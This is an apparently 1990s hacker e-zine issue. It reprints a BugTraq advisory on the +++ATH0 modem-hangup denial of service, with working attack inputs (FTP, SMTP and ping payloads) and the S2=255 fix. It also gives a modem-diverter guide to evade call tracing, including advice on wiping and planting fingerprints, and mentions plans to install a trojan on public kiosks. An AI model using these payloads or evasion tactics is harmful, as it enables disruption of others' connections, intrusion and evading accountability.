_____________________________________________
/ \
| ___________________________________ |
| | | | | |
| | | | | |
| | | | | |
| | _________| | | |
| | / \ | |
| | / \ | |
| | / \ | |
| |__________/ \__________| |
| / | \ |
| / | \ |
| / | \ |
| /______________|______________\ |
| |
| Computer Academic Underground |
| |
| Electronic Magazine |
| Volume 4, Number 1 |
| 0115.99 |
\ _____________________________________________ /
##############################################################################
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
==============================================================================
------------------------------------------------------------------------------
..............................................................................
Table of Contents
Foreward
General
Member Listing
Hacking
Modem Divertor digital/Digital
GTE Cybercenter Update I)ruid
Life With No P.T.P. Protocol
Exploit of the Month I)ruid
Phreaking
Local Scene
Bulletin Board Systems
2600 Meetings
Events
Closing
##############################################################################
Foreward
Well, apparently history has repeated itself once again, as the
CAU E-Zine has not come out for a number of months during the summer,
fall, and part of winter, just like it did last year, although this year
there was a much longer absence of releases. This was mainly due to myself
not having enough time to work on it due to my involvment in a number of
projects that required most of my attention, lots of legal problems,
and a serious lack of articles. However, I have finally scraped together
the time and content for another issue, and here is the result, even though
it's getting released almost 3 weeks late.
Since the last release, the CAU GHQ server has been moved to an ISDN,
even though it was on a T1 for a little over 4 months, but that had to stop,
so we're now back to a little bit of bandwidth (thanks to good friends with
resources). This should hopefully make downloading the zine still somewhat
fast, as well as anything else, and the webserver should be a little more
responsive, as I tweaked the CGI code a little bit, and upgraded the OS as
well as Apache.
But anyway, on to the zine.
I)ruid
##############################################################################
General
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Member Listing
(In the order in which they were brought into the CAU)
Handle IRC Nick E-Mail
--------------------------------------------------------------
I)ruid I}ruid druid@caughq.org
ultra violet uv_ uv@caughq.org
Crimson Assassin Crim crimson@caughq.org
Fizban Fizban^ fizban@caughq.org
Sublime _sublime_ sublime@caughq.org
int3l int3l int3l@caughq.org
MajestiX maJesTix majestix@caughq.org
--------------------------------------------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
##############################################################################
Hacking
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
SIMPLE MODEM DIVERTER DESIGN
A basic modem diverter is simple to make, and requires only a few
common components. The design can be expanded in many ways, as well. The
concept is not new, and I take no credit for anything other than the
design specs given.
DISCLAIMER
Your work, your actions, your responsibility, your ass.
FUNCTION
A modem diverter is a piece of hardware that, when used, diverts an
incoming signal on a phone line to another line.
This particular design is for data only. In the most basic setup, it
works like this:
incoming line
Your location ----> Diverter Line 1 (555-2222)
(555-1111) |
Diverter Line 2 (555-3333) ----> Target location
outgoing line (555-4444)
If you were to dial that target number (555-4444) from your home location
(555-1111) a caller ID or trace would trace back to you at 555-1111. But
after going through the diverter, a trace would only trace back to the
Diverter line 2 at 555-3333!
Here is a sample terminal session:
ATZ
OK
ATDT555-2222
CONNECT 2400
_
(at this point, you just have a waiting cursor - the modem on line 2
(outgoing line) is waiting for your commands.)
ATZ
OK
ATDT555-4444
CONNECT 2400
======================================
Welcome to SomeSystem!
Our caller-id says you are dialing in
from 555-3333!
=====================================
_
(Note that the hypothetical trace reads 555-3333, which is line 2
(outgoing line) of the diverter, and NOT your location of 555-1111! This
is because 555-3333 is the one actually making the call.)
USES
The applications of such a unit are of obvious value. It can be useful to
not have your true location appear on a caller ID or a trace. Note that
should the diverter be discovered, the incoming line can be identified and
calls made to it crosss-referenced with calls from the outgoing line.
With enough work, it can still be traced. These issues (and safeguards)
will be discussed later.
Another possible use has nothing to do with subterfuge. Suppose you have
a BBS or access number in a nearby city that is outside local calling
range. If you can place the diverter in a location such that it is a
local call to the diverter, and a local call from the diverter to the
target, you can make the calls without long distance charges!
COMPONENTS
Components needed for a basic modem diverter are:
2 external modems
2 phone lines (1 for incoming, 1 for outgoing)
1 null-modem cable (male-male)
Appropriate phone cables and connectors
The null-modem cable must be of decent quality. Some null-modems (or
null-modem adapters) do not connect all the pins. To make sure you have a
decent cable, you can either:
- Buy one and try it - if it doesn't work, try another
- Plug it into a breakout box and make sure the connections are
there
- Don't use the cheapest cable
- Check the packaging to see if it says whether or not
all the pins are connected.
Also, at least one of the modems themselves must be able to be set into
DUMB MODE. Some newer modems do not have this ability, others do. There
are two typical ways to put a modem into dumb mode: either there is a DIP
switch (like the back of USR modems) for SMART MODE/DUMB MODE, or there is
a jumper inside the modem to set it to SMART/DUMB. Most older modems
have the jumper. The third way - putting the modem into DUMB mode via an
AT command - is not desireable and should be avoided. Another term for
DUMB mode is "turning off AT command recognition".
Remember that your diverter will only be able to go as fast as the slower
of the two modems.
SETUP
1. Put one modem into DUMB mode, the other into SMART mode.
2. Configure the DUMB mode modem to auto-answer. A way to do this (not
guaranteed to work on all modems) would be ATS0=1&W . Check your modem
manual for details. If the modem has a DIP switch to enable auto-answer
as well, make sure it is on.
3. Plug the null-modem cable into the butt of both modems.
4. Connect the incoming line to the DUMB mode modem. This is the modem
you will be dialing INTO when you call the diverter with another modem.
Many modems have 2 RJ-11 jacks on the back (phone jacks). The one you
want to plug in to is probably labeled WALL, LINE, or TELCO.
5. Connect the outgoing line to the SMART mode modem. Again, the plug you
want to plug into is labeled WALL, LINE, or TELCO.
6. Connect power to the modems.
7. Test the diverter by placing a call.
USING THE DIVERTER
To place a call:
Set your terminal software to the baud rate of the slower of your
two modems in the diverter. Dial the incoming line of the diverter with
your modem. Since we configured it to auto-answer, it will answer your
call. But, instead of being connected to a server of some kind, it is
connected to the SMART modem. If you are using a terminal program, you
would see something like: (comments in ()'s )
C:\1AM37337\SIMPLET>simplet.exe
--------------------------
Welcome to SimpleTERMINAL!
--------------------------
ATZ
OK
ATDT555-2222 (dial the incoming line of the diverter)
(ring, ring)
CONNECT 2400
(you are now connected to the outgoing modem - you can test that you are
connected properly by typing AT and hitting ENTER. You should see OK.)
AT
OK
(Now, you can dial out to your destination)
ATDT555-4444 (The number you are trying to reach via the
diverter)
(ring, ring)
CONNECT 2400
At this point, your connection is complete and the diverter should be
transparent to the connection in every way. You should be able to type,
download, etc normally.
To End a Call:
A way to force a disconnect on the outgoing modem is to type '+++'
(three plus signs in rapid succession) to get back to the command mode of
the outgoing (SMART) modem. You can then type ATH and ENTER to force the
modem to hang up. You can then disconnect your own modem from the
incoming (DUMB) modem to end the call.
You should in theory be able to simply disconnect your own line
from the incoming line of the diverter to hang up both sides of the
diverter, but I would recommend testing this first before putting it into
practice.
LOCATION
Is is important for the diverter to be in a secure location.
Obviously, you don't want just anyone messing with it - not to mention
walking off with it. If you are putting the diverter in the equivalent of
"private property" (ie somewhere you don't belong) you should get
permission where possible and practical. In any case, unless you are
going to be near the unit all the time, it is adviseable to use a measure
of safeguards.
SAFEGUARDS & COUNTERMEASURES
Normally, this means usually simple methods of preventing someone
from opening, breaking, or walking off with your diverter. For the more
paranoid, this can also include fingerprints, tamper alerts, and so on.
For non-tamper safeguards, put the diverter in a sturdy box or
container. You can even remove the modems from their cases and place those
in the container to make it look more like a "product". Just be sure to
insulate the modem PCBs. The case can be securely shut and/or bolted
down. A purloined or counterfeit Telco company sticker or logo can also
increase the illusion that it's something that is "supposed to be there".
Do not ignore the more low-tech safeguards. If you have a need
not to be traced to the diverter OR calls, do not call the diverter from
your home line or from anywhere else you can be connected to. Do not use
components that have your name stenciled into them, or your home number in
the modem's NVRAM. For a truly paranoid safeguard, wipe all fingerprints
from the modem and cables and case, then do all assembly while wearing
latex gloves. Perhaps a false trail could be laid by social-engineering
someone to hold/handle the box or components before you put it into use -
therefore getting THEIR fingerprints on it.
For those with electronics knowledge, a tamper-switch could be
installed into the box that could trigger some kind of alert once the
diverter is opened. This could be triggered to destroy the contents, or
send some sort of remote alarm.
IMPROVEMENTS
A measure of security can be added with some work by programming a
PIC or microcontroller to sit between the two modems in the diverter and
not allow access unless a certain DTMF tone or password is used. This can
be combined with the tamper-switch to, for example, change a welcome
banner slightly upon someone messing with the diverter. This requires
much more work and tools than the basic model, though.
For more information about this design, or any other thoughts or
suggestions, email me.
digital/Digital
digitaldigital@darkcore.com
[ EDITOR'S NOTE: This article originally appeared in 2600 Magazine
(www.2600.com), and has been reprinted with the permission of the author. ]
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
GTE Cybercenter Update
If you have not read my papers on the GTE Cybercenters, I suggest
that you go read CAU E-Zine Volume 2 Number 7 and Volume 2 Number 8 for a
little background information to this article, as this is a followup
article to both of those articles.
The other day I was walking through the local Grapevine Mills
mall, and Crimson had gone off by himself while dee, sublime, and myself
looked at movies in the Virgin Music store. Crim came back a few minutes
later telling me he had found a GTE Cybercenter that had recently been put
into this mall. This is the first GTE Cybercenter that I had seen since
the ones we found in the D/FW International Airport, so I assume that GTE
is putting these horrid things in more and more locations. However, what
was different about this particular GTE Cybercenter is that it was more of
a booth than a pyramid shaped structure to stand at, and it had a totally
different interface, but was essentially the exact same machine, compelte
with credit card mag stripe reader and all, also a flopy drive. This one
also had the additional option of using Micro$oft Word.
This new type of Cybercenter did NOT allow for any type of free
web browsing (heh... I wonder why...), so I could not access any of my
specially designed GTE Cybercenter CGI's through a browser to manipulate
the machine to do my bidding. At one point, I could do an ALT-TAB and
switch between two shown processes, but both immediately brought me back
to the same GTE Cybercenter main screen prompt. Hitting CTRL-ALT-DEL
would result in a screen-flicker, cosisting of a switch to athe blue
default desktop color, and then back to the GTE Cybercenter main screen
prompt. I was not able to get much farther with this particular GTE
Cybercenter as the mall was closing and it was time for us to all go see
our movie we were waiting for however I plan to attempt to integrate
Protocol's Trojan program with this machine to take full control. I will
keep you all posted on my progress.
I would be interested in hearing from anyone else that has
experimented with these GTE Cybercenters, or any similar type of
workstation that you may have in your area, if you are not in a GTE
Telecom area. My email address is druid@caughq.org, so please send any
coorespondance to that address.
I)ruid
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Life With No P.T.P.
So what is this p.t.p. stuff you ask? Well fear not true believer
i'm referring to plain text passwords. If you don't know why PTPs are bad you
really shouldn't be reading this zine now should you just go back to working
at fry's or best buy or wherever the clue impaired hang. So I decided to rid
me an PuffNstuff's network. So new install of Linux and minimal install. No
inetd or ping or ftp, or telnet or anything that makes it nice to be on a
box. Just httpd and smtp an ssh. That is all I had up and here is the latest
from nmap:
Port State Protocol Service
22 open tcp unknown
25 open tcp smtp
80 open tcp http
110 open tcp pop-3
22 is from ssh so no prob there cept for the client, right mallard pie? :),
25 is mail so major probs there although not in the ptp area unless somebody
sends the password by e-mail but, we have no marketing department, so I figure
we are safe on that for now. Ftp has been the real tough thing to give up.
I can always ssh in and pull the files but, I still need ftp on one end so
not the best solution. Apache with ssl and netscape file upload works ok but,
it can't do folders yet. I found a couple of scripts that allow remote admin
through the web, so that could be good.
(more to come)
Protocol
(the way to do things)
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Exploit of the Month
Allright, this exploit came to me by way of the BugTraq mailing
list quite a while ago... it's just hilarious... You'd think by now this
would have been fixed, considering it's been around forever, I even remember
it from my BBSing days about 8 years ago. I never gave it another thought
until I saw this:
==============================================================================
From wage@IDIRECT.CA Thu Oct 8 08:35:29 1998
Date: Sun, 27 Sep 1998 13:52:33 -0400
From: "Max Schau (Noc-Wage)"
To: BUGTRAQ@netspace.org
Subject: 1+2=3, +++ATH0=Old school DoS
+++ATH0
Prepared by Noc-Wage (Max Schau, M.C.S.R)
Brought to you by the wonderful people of #hackers undernet and M.C.S.R
All OS's using a dial-up connection are at risk.
***NOTE***
This is an old exploit, but there has been nothing done to get rid of it,
so maybe bringing it to everyone's attention (as I am not aware of a
"formal" release explaining the exploit exsisting) might get something
done, or atleast raise awareness.
***NOTE***
Originally brought to my attention by nak, and maffew "s2=255 Fix" brought
to my attention by SuiDRoot and Sygma within minutes of each other. (I
overlooked checking modem manuals) Also thanks to Defraz, DrSmoke and
zerox (swab) for allowing me to bounce ideas off them and for contributing
ideas to the project. Thanks go out to the rest of the people in #hackers
for allowing me to keep bugging them about various standards and other
boring things.
Maybe this will even make you remember the good old days of the 80s-early
90s and BBS's ;)
Most modems today follow the Hayes Command set (ATZ, ATDT, ATH0..)
Unfortunately the way that these modems handle certain strings leaves them
susceptible to a specific type of DoS attack. By forcing the victim to
respond with the string "+++ATH0" many brands of modems will interpret the
+++ATH0 as the user manually attempting to enter command mode and execute
a command. Because of this, when the victim attempts to respond with the
+++ATH0 the modem sees it within the IP datagram and hangs up the modem.
**Not all modems are effected**
Some, such as the U.S. Robotics, 33.6 type modems require that there be a
pause of a about a second where no text is sent preceding the +++ before
going into command mode. This makes it impossible to force the modem to
hang up since there is no way to get the victim machine to reply with +++
without data immediately following. This is because PPP Frames have data
after the IP datagram, so if you some how managed to make the victim reply
with a damaged IP datagram that had +++ as the last three values, the
following end of the PPP frame would be the data which made the modem
ignore the +++.
An example of a possible attack follows:
(IP addresses have been changed for obvious reasons)
[wage@koroshiya /]$ telnet 192.168.1.1 21
Trying 192.168.1.1...
Connected to 192.168.1.1.
Escape character is '^]'.
220 foo FTP server (Version wu-2.4.2-academ[BETA-15](1) Fri Dec 12
20:41:
USER +++ATH0
^]
telnet> close
Connection closed.
[wage@koroshiya wage]$ telnet 192.168.1.1 21
Trying 192.168.1.1...
telnet: Unable to connect to remote host: Network is unreachable
[wage@koroshiya wage]$
Modems known to be affected:
Logicode 28.8
Supra 33.6 (internal)
Diamond Supra v.90
Many more but this is all we had available.
All of the USR modems we tested against were not effected, but most other
brands ARE.
On some machines the process (such as ftpd or sendmail) which the attacker
connected too does not realise the connection has been lost, this can
result on a seemingly random disconnect after reconnecting.
PPP does NOT compress the IP datagram by default, thus the ip datagram
contained within the PPP frame will be exactly the same. Thus if the IP
datagram contains "+++ATH0" the modem will receive the string exactly as
such.
Two ways to cause the victim to "send" you the +++ATH0 are to:
1) Connect to sendmail (does not work with qmail) do "HELO blah.com"
Then type "VRFY +++ATH0", normally it would say:
550 +++ATH0... User unknown, but because their modem interprets
the +++ATH0 the modem is hung up.
2) Connect to FTP and type "USER +++ATH0". Normally it would respond:
331 Password required for +++ATH0. But because the modem sees the
+++ATH0 it disconnects.
As you can see it is very simple, and millions of different ways can
easily be found to generate the same result. For the sake of annoying
script kiddies I'm not going to put the wonderful IRC command, but if you
use your brain you can figure it out easy enough.
Of course, this attack is very similar to a pipe bomb. Sometimes it
works, sometimes it doesn't, and sometimes it blows up in your face. If
your modem is effected by this attack then that means that if you try and
attack there is a chance you will be disconnected. When you send the
+++ATH0 your modem will ALSO see it. There are ways around this such as
attacking from server on a connection such a ISDN, cable modem...
To protect yourself add in your modem initialization string "s2=255" which
will disable the modem's ability to go into command mode. (Can cause
problems for some people). What s2 does is change the character which is
used to enter command mode. Normally any value over 127 disables the
ability to manually enter command mode but in some cases it requires a
higher number, to be sure just put 255.
Greetings go out to: Humble (horizon), Hey! e-mail me! Colon\\`Q in
#hackers: SuIDRoot, halt, EpiC, DrSmoke, Defraz, WorldWide(did I forget?),
iCBM, trix, anacarda, nak, swab/zerox, awgn #snickers: Sygma, Sheenie,
RedBull, n`tropy, un-saad, Hole(Geez, you'd think I won an Oscar) From my
home town of Milton: AsH, Nullifier(Alex H.) MCSR: AsH, CONGO
Now following is MrPhoenix's way of getting the same result WITHOUT
needing to connect. He uses PING packets to get the same result of
forcing the victim to respond with the string.
Here is what he sent me:
+++ATH0 Ping exploit
Ping modem killer by MrPhoenix (phoenix@iname.com).
This is a simple exploit for the +++ATH0 bug contained in Noc-Wage's post.
Affected: All modems w/o the requirement of a 500msec or more idle period
after the +++ command, connected with a PPP connection w/o
encryption/compression.
Some ways of making a modem to hung up were introduced by Noc-Wage by
using the sendmail or ftp daemon, or even an IRC connection. But there is
a simplest way without requiring the existence of an active daemon or an
IRC connection. You can send an ICMP ECHO_REQUEST to the target to elicit
an ICMP ECHO_RESPONSE, and fill the packet with the +++ATH0
characters.
The might help in some modems which require the ATH0 command to be
followed by carriage return. So the target gets the ICMP ECHO_REQUEST and
sends the ICMP ECHO_REPLY to you with the same data of the ICMP
ECHO_REQUEST packet. This way the modem reads the +++, goes to command
mode, then reads the command ATH0, and closes the connection.
To make the above happen you can either make your own program to send the
required packet, or use the ping program with the *wonderful* option "-p"
with which you can specify up to 16 bytes to fill out the packet to send.
The "-p" option requires the pattern to be entered in hex digits. The
equivalent of the '+++ATH0' string in hex is: 2b2b2b415448300d .
The complete command is : ping -p 2b2b2b415448300d
*NOTE*: The "-p" option is not supported by the"ping" program from
Microsoft shiped with MS-Windows.
Here is an example:
[root@narf ath0]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 0 packets received, 100% packet loss
[root@narf ath0]#
That's what you'll get if it modem closes the connection. I send 5 packets
just to make sure because sometimes 1-2 packets might not work.
Here is what you'll get if the bug doesn't work:
[root@narf ath0]# ping -p 2b2b2b415448300d -c 5 xxx.xxx.xxx.xxx
PATTERN: 0x2b2b2b415448300d
PING xxx.xxx.xxx.xxx (xxx.xxx.xxx.xxx): 56 data bytes
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=0 ttl=252 time=182.4 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=1 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=2 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=3 ttl=252 time=190.1 ms
64 bytes from xxx.xxx.xxx.xxx: icmp_seq=4 ttl=252 time=180.1 ms
--- xxx.xxx.xxx.xxx ping statistics ---
5 packets transmitted, 5 packets received, 0% packet loss
round-trip min/avg/max = 180.1/186.5/190.1 ms
[root@narf ath0]#
To protect yourself you can disable the +++ command by setting the S2
register to 255 (the easy way), or by patching your kernel to drop the
incoming packets containing the "+++ATH0" string (the hard way).
Greetings to: everybody in #grhack,
zerox who helped me find this exploit,
Noc-Wage, nac, maffew and everybody else in #hackers
all the Greek hackers.
==============================================================================
Well, there it is in full... All I can do is laugh...
ping -p 2b2b2b415448300d -c 5
'nuff said...
I)ruid
##############################################################################
Phreaking
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Nothing here this Month... Thanks for Playing, please drive through.
##############################################################################
Local Scene
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Bulletin Board Systems
In the future, we will hopefully reduce this list to Hack/Phreak
oriented BBS's ONLY, but for now, since there are so few BBS's at all,
we'll just list all of them.
------------------------------- --- --- ---- ----------------------------
System Identification NPA.WC-.NUMS NOTES
------------------------------- --- --- ---- ----------------------------
A Non-BBS 972.355.9889
Bare Facts 817.284.2551 Adult Oriented
Metro Line 817.429.2667
Cat Killers 817.491.3712
Node 2 817.491.3629
Chrysalis 817.540.5565 Multi-Node Chat BBS
Fortress, The 817.763.5583
Frayed Ends Of Sanity 817.297.7459
Kewl Stuff 817.294.9094
Mystic Realms 817.377.4440
Metro Line 817.784.9370
Nimbus 817.246.3295
Nova Tech 972.475.3833
sdf.lonestar.org 972-317-6960 Free Linux shell provider
Unicorn Valley 817.534-0365
Violent in Public 972.494.1024 Hacker/Phreak Oriented
Virtual Village 214.739.8328
------------------------------- --- --- ---- ----------------------------
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
2600 Meetings
First Friday of Every Month
6:00pm until 9:00pm
817 2600 Meeting
North East Mall Food Court
N.E. Loop 820 at
Bedford Euless Rd.
Hurst, Texas
Payphone: 817.???.????
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Events
First Saturday Sidewalk Sale
First Saturday of Every Month
Midnight through Satuday Afternoon
Ross Avenue at Pearl St
Dallas, Texas
##############################################################################
Closing
Danm, there were a lot of articles in this issue dealing with
modems... interesting, but no phreak related articles... Well, until next
month...
I)ruid
##############################################################################
____ ____ __ __
/ \ / \ | | | |
----====####/ /\__\##/ /\ \##| |##| |####====----
| | | |__| | | | | |
| | ___ | __ | | | | |
------======######\ \/ /#| |##| |#| |##| |######======------
\____/ |__| |__| \______/
Computer Academic Underground